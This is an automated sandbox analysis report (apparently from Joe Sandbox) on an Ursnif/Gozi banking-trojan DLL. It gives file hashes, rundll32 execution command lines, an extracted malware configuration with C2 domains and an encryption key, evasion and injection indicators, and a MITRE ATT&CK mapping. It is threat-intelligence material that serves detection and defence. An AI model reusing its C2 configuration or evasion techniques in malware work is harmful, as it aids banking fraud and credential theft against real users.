Analysis Report kZcCqvNtWa.dll

Overview

General Information

Sample Name:kZcCqvNtWa.dll
Analysis ID:412159
MD5:b9b732dbc6f94c79b5767eb98ebd899a
SHA1:984a3ba5d4fe06265ce23cec82bda6a63b2bb3bc
SHA256:1a0d4b328438a72cee012f6387825d942463b896fadc13f2c17e8d005f510cd4
Tags:dll, Gozi, ISFB, Ursnif

Detection

Ursnif
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Machine Learning detection for sample
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 1956 cmdline: loaddll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 1720 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5788 cmdline: rundll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5820 cmdline: rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Eithernothing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 2168 cmdline: rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Order MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6160 cmdline: rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Smileschool MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 1492 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5168 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1492 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "KujE77ctKyR8x3/dODwZbEsxGmck+FW9384s5u0Kacw8y1gCN+8m2bfjJPovkn+Uzufcdfss+a43eI6oHR1KgWQmvEAO6LK8tJv+Wl7iCBPJP7eef8xKeXht/Mhk1PSj7mHnJ9lcqKMtTteEdSecVvMRtb/WSKVTFfHDva9My7AJ/NbXqHdzCG7znACswLxD", "c2_domain": ["outlook.com/login", "gmail.com", "worunekulo.club", "horunekulo.website"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.477098512.0000000002FA8000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
Process Memory Space: loaddll32.exe PID: 1956 | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      AV Detection:

      Found malware configuration
      Source: 5.3.rundll32.exe.d2a427.0.raw.unpackMalware Configuration Extractor: Ursnif {"RSA Public Key": "KujE77ctKyR8x3/dODwZbEsxGmck+FW9384s5u0Kacw8y1gCN+8m2bfjJPovkn+Uzufcdfss+a43eI6oHR1KgWQmvEAO6LK8tJv+Wl7iCBPJP7eef8xKeXht/Mhk1PSj7mHnJ9lcqKMtTteEdSecVvMRtb/WSKVTFfHDva9My7AJ/NbXqHdzCG7znACswLxD", "c2_domain": ["outlook.com/login", "gmail.com", "worunekulo.club", "horunekulo.website"], "botnet": "8877", "server": "12", "serpent_key": "30218409ILPAJDUR", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
      Multi AV Scanner detection for submitted file
      Source: kZcCqvNtWa.dllReversingLabs: Detection: 21%
      Machine Learning detection for sample
      Source: kZcCqvNtWa.dllJoe Sandbox ML: detected
      Source: kZcCqvNtWa.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
      Source: Binary string: c:\Tube-meet\585\straight\lift\38_Claim\Tail.pdb source: loaddll32.exe, 00000000.00000002.480778808.000000006E289000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.479153934.000000006E289000.00000002.00020000.sdmp, kZcCqvNtWa.dll
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D4C3B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_001D4C3B
      Source: unknownDNS traffic detected: queries for: outlook.com

      Key, Mouse, Clipboard, Microphone and Screen Capturing:

      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000002.477098512.0000000002FA8000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 1956, type: MEMORY

      E-Banking Fraud:

      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000002.477098512.0000000002FA8000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 1956, type: MEMORY

      System Summary:

      Writes or reads registry keys via WMI
      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Writes registry values via WMI
      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E241F14 NtMapViewOfSection,0_2_6E241F14
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2415F1 GetProcAddress,NtCreateSection,memset,0_2_6E2415F1
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2423A5 NtQueryVirtualMemory,0_2_6E2423A5
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D1168 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_001D1168
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001DB2F1 NtQueryVirtualMemory,0_2_001DB2F1
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2421840_2_6E242184
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001DB0CC0_2_001DB0CC
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D696A0_2_001D696A
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D1B6A0_2_001D1B6A
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2789600_2_6E278960
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2821530_2_6E282153
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2789603_2_6E278960
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2821533_2_6E282153
      Source: kZcCqvNtWa.dllBinary or memory string: OriginalFilenameTail.dll0 vs kZcCqvNtWa.dll
      Source: kZcCqvNtWa.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
      Source: kZcCqvNtWa.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal76.troj.winDLL@14/4@3/0
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D7F56 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_001D7F56
      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
      Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DFE4F68CE1A440F339.TMP
      Source: kZcCqvNtWa.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.ini
      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Eithernothing
      Source: kZcCqvNtWa.dllReversingLabs: Detection: 21%
      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll'
      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll',#1
      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Eithernothing
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll',#1
      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Order
      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\kZcCqvNtWa.dll,Smileschool
      Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
      Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1492 CREDAT:17410 /prefetch:2
      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
      Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
      Source: kZcCqvNtWa.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: kZcCqvNtWa.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: kZcCqvNtWa.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: kZcCqvNtWa.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: kZcCqvNtWa.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: kZcCqvNtWa.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: kZcCqvNtWa.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: c:\Tube-meet\585\straight\lift\38_Claim\Tail.pdb source: loaddll32.exe, 00000000.00000002.480778808.000000006E289000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.479153934.000000006E289000.00000002.00020000.sdmp, kZcCqvNtWa.dll
      Source: kZcCqvNtWa.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: kZcCqvNtWa.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: kZcCqvNtWa.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: kZcCqvNtWa.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: kZcCqvNtWa.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2417FA LoadLibraryA,GetProcAddress,0_2_6E2417FA
      Source: kZcCqvNtWa.dllStatic PE information: real checksum: 0x84de2 should be: 0x8037c
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E242120 push ecx; ret 0_2_6E242129
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E242173 push ecx; ret 0_2_6E242183
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001DB0BB push ecx; ret 0_2_001DB0CB
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001DAD00 push ecx; ret 0_2_001DAD09
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E282761 push ecx; ret 0_2_6E282774
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E254348 push ss; ret 0_2_6E25434B
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E25778D pushfd ; ret 0_2_6E2577AB
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E252F9A push edi; retf 0_2_6E252FA4
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E252C15 push ebp; retf 0_2_6E252C16
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E282761 push ecx; ret 3_2_6E282774
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E254348 push ss; ret 3_2_6E25434B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E25778D pushfd ; ret 3_2_6E2577AB
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E252F9A push edi; retf 3_2_6E252FA4
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E252C15 push ebp; retf 3_2_6E252C16

      Hooking and other Techniques for Hiding and Protection:

      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000002.477098512.0000000002FA8000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 1956, type: MEMORY
      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D4C3B RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_001D4C3B
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E28636F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E28636F
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2417FA LoadLibraryA,GetProcAddress,0_2_6E2417FA
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2B5770 mov eax, dword ptr fs:[00000030h]0_2_6E2B5770
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2B56A6 mov eax, dword ptr fs:[00000030h]0_2_6E2B56A6
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E2B52AD push dword ptr fs:[00000030h]0_2_6E2B52AD
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2B5770 mov eax, dword ptr fs:[00000030h]3_2_6E2B5770
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2B56A6 mov eax, dword ptr fs:[00000030h]3_2_6E2B56A6
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E2B52AD push dword ptr fs:[00000030h]3_2_6E2B52AD
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E282F08 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6E282F08
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E28636F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E28636F
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E28150C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6E28150C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E282F08 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6E282F08
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E28636F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6E28636F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E28150C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6E28150C
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\kZcCqvNtWa.dll',#1
      Source: loaddll32.exe, 00000000.00000002.476337684.0000000001240000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.477553156.0000000003910000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: loaddll32.exe, 00000000.00000002.476337684.0000000001240000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.477553156.0000000003910000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: loaddll32.exe, 00000000.00000002.476337684.0000000001240000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.477553156.0000000003910000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: loaddll32.exe, 00000000.00000002.476337684.0000000001240000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.477553156.0000000003910000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D2D6E cpuid 0_2_001D2D6E
      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,0_2_6E287660
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,3_2_6E287660
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E241237 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,GetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_6E241237
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_001D2D6E RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_001D2D6E
      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E241CDD CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_6E241CDD

      Stealing of Sensitive Information:

      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000002.477098512.0000000002FA8000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 1956, type: MEMORY

      Remote Access Functionality:

      Yara detected Ursnif
      Source: Yara matchFile source: 00000000.00000002.477098512.0000000002FA8000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 1956, type: MEMORY

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Windows Management Instrumentation (2) | Path Interception | Process Injection (12) | Masquerading (1) | OS Credential Dumping | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Native API (1) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection (12) | LSASS Memory | Security Software Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information (1) | Security Account Manager | Process Discovery (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol (1) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Rundll32 (1) | NTDS | Account Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing (1) | LSA Secrets | System Owner/User Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | File and Directory Discovery (2) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
      External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Information Discovery (23) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact

      Behavior Graph

      [Behavior graph image. Behavior Graph ID: 412159, Sample: kZcCqvNtWa.dll, Start date: 12/05/2021, Architecture: WINDOWS, Score: 76]

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      kZcCqvNtWa.dll | 21% | ReversingLabs | Win32.Trojan.Zusy
      kZcCqvNtWa.dll | 100% | Joe Sandbox ML |

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      Source | Detection | Scanner | Label
      0.2.loaddll32.exe.1d0000.0.unpack | 100% | Avira | HEUR/AGEN.1108168

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      outlook.com | 40.97.153.146 | true | false | | high
      HHN-efz.ms-acdc.office.com | 52.98.171.226 | true | false | | high
      www.outlook.com | unknown | unknown | false | | high
      outlook.office365.com | unknown | unknown | false | | high

              Contacted IPs

              No contacted IP infos

              General Information

              Joe Sandbox Version:32.0.0 Black Diamond
              Analysis ID:412159
              Start date:12.05.2021
              Start time:13:00:39
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 6m 50s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:kZcCqvNtWa.dll
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:25
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal76.troj.winDLL@14/4@3/0
              EGA Information:Failed
              HDC Information:
              • Successful, ratio: 20.6% (good quality ratio 19.9%)
              • Quality average: 81%
              • Quality standard deviation: 27%
              HCA Information:
              • Successful, ratio: 73%
              • Number of executed functions: 44
              • Number of non-executed functions: 59
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .dll

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              No context

              Domains


              ASN

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{20078DE0-B35D-11EB-90E4-ECF4BB862DED}.dat
              Process:C:\Program Files\internet explorer\iexplore.exe
              File Type:Microsoft Word Document
              Category:dropped
              Size (bytes):19032
              Entropy (8bit):1.7704690064419406
              Encrypted:false
              SSDEEP:48:IwBGcprEGwpLWG/ap8wGIpcVdGvnZpvVyGoSqp9VKGo49pmV:r3Z8ZU2gWV6tV8fVd9MV
              MD5:13E47D90BC1C1D71FB960BD7DBF91099
              SHA1:17385913779143F5D7281C96EAFF4EA46F7A563A
              SHA-256:0E0755C66FE657EF520818206045A6C0D2DD547A64BEBF294700E20579CD3980
              SHA-512:2CD7DFA4FA6918CCAD344592A477369BB5EBF312E5EEF21193C252F06D7A0B303CF6582FA5D9966B9634197D3BDA3BAABD7DD6A6435057C31CF2CD1B67CE3720
              Malicious:false
              Reputation:low
              C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{20078DE2-B35D-11EB-90E4-ECF4BB862DED}.dat
              Process:C:\Program Files\internet explorer\iexplore.exe
              File Type:Microsoft Word Document
              Category:dropped
              Size (bytes):14936
              Entropy (8bit):1.5448255572685763
              Encrypted:false
              SSDEEP:48:Iw0GcprdGwpaVG4pQJGrapbSaGQpB6GHHpm:roZHQH6pBSijBg
              MD5:75B9311DC327D4B60EDACD38906AAD77
              SHA1:F6936702FDCB04C1D892B8E57DD19990B802786D
              SHA-256:E7BDD1D59779EFA94418DC0D478B7D11D753157B8C20AFBCCD006CF377B3C346
              SHA-512:AF51F9501B1D91B0E1B445D6F098C0F3519272D229EB6F8016B63B6C465930900BE9ABD7D9674E40FDD777ACF45E745AEE3B505B4CD210F2E1FCED6B84324873
              Malicious:false
              Reputation:low
              C:\Users\user\AppData\Local\Temp\~DF431E96C18C7F8EF8.TMP
              Process:C:\Program Files\internet explorer\iexplore.exe
              File Type:data
              Category:dropped
              Size (bytes):21349
              Entropy (8bit):0.2951707289341719
              Encrypted:false
              SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lw0:kBqoxKAuvScS+0
              MD5:F9BEBD0A297294BDC7B8C6114EB819EE
              SHA1:B1B441E13DB70A0D1E0CC3A2A6190C5C1A91F3D8
              SHA-256:6A30EE99C23AA29DC94019C3BAA95B463123752680D4FE185BF5FA05BEF15F17
              SHA-512:01B70F54D5091580CA105C7F04407B48EE2FFDCD7C77BAA39F871407577F9F4F193BAB3AFB9924BE7DC50568534A226D63EA77FFE8B8F13889DAFE632DA3B498
              Malicious:false
              Reputation:low
              C:\Users\user\AppData\Local\Temp\~DFE4F68CE1A440F339.TMP
              Process:C:\Program Files\internet explorer\iexplore.exe
              File Type:data
              Category:dropped
              Size (bytes):12917
              Entropy (8bit):0.39624837245012057
              Encrypted:false
              SSDEEP:24:c9lLh9lLh9lIn9lIn9lo0F9loU9lWXFhOB:kBqoIv51kB
              MD5:4762FCF754568D904969642F670EB3B1
              SHA1:75FC43D947F228DAA1EC1BA2E54562C8FC869D41
              SHA-256:8E4034726C607D15EF4ADEEC4D952A17EAE0ADC1F52AEC4A96752316D7A53060
              SHA-512:DBDF57587E7E3EC021A14FC21303A2E7EB7DDF7D66B38D69478566079C5546454C808A3A48786A7524A65ACAD54E076FE832935C5390DBF61B4AFFB0E96DA262
              Malicious:false
              Reputation:low

              Static File Info

